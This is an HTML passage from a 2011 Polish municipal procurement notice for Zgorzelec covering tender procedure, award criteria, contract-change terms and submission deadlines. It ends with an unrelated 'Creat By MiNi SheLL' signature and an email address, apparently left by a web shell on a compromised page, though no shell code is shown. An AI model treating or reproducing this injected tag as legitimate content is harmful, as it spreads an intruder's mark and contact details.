3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ.
     Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
     powierzyć do wykonania  część zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania  zmian postanowień zawartej 
umowy, przy czym  warunki takiej zmiany Zamawiający określił w § 9 ust. 2 projektu 
umowy. 
1. Zakres przewidzianych zmian: 
    1) zmiana osób o których mowa w § 3 ust. 1 projektu umowy z imienia i nazwiska,  
     odpowiedzialnych za realizację umowy, będzie możliwa w każdym czasie w trakcie 
     związania umową, pod warunkiem, że osoby te posiadać będą co najmniej takie same 
     uprawnienia jak osoby wskazane przez Wykonawcę w ofercie. 
    2) zmiana Podwykonawcy możliwa będzie jedynie wtedy, gdy zakres realizowanych 
        przez Podwykonawcę robót, nie ulegnie zmianie w stosunku do zakresu robót 
        wskazanych w ofercie Wykonawcy, a które zaplanował on do realizacji przez 
        Podwykonawcę. Zmiana taka możliwa będzie jedynie na uzasadniony  wniosek 
        Wykonawcy, do którego winien załączyć projekt umowy z Podwykonawcą, przy 
        czym wymagana jest w tym przypadku pisemna zgoda Zamawiającego na zawarcie 
        przez Wykonawcę umowy z innym Podwykonawcą. 
2. Warunkiem wprowadzenia zmian do zawartej umowy będzie potwierdzenie powstałych 
    okoliczności w formie opisowej i właściwie umotywowanej, potwierdzonej przez każdą 
    ze stron umowy. 
3. Strona ubiegająca się o zmianę umowy w w/w przypadkach, powinna zwrócić się do  
    Wykonawcy/Zamawiającego w formie pisemnej z wnioskiem,  o wprowadzenie 
    zmian  w umowie aneksem, w  terminie 7 dni od daty zdarzenia uzasadniającego 
    zmianę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Zgorzelec
Wydział Zamówień Publicznych
59-900 Zgorzelec ul. Domańskiego 6 pokój 6.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2011 godzina 11:00, miejsce: Urząd Miasta Zgorzelec
59-900 Zgorzelec 
ul.  Domańskiego 7
Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com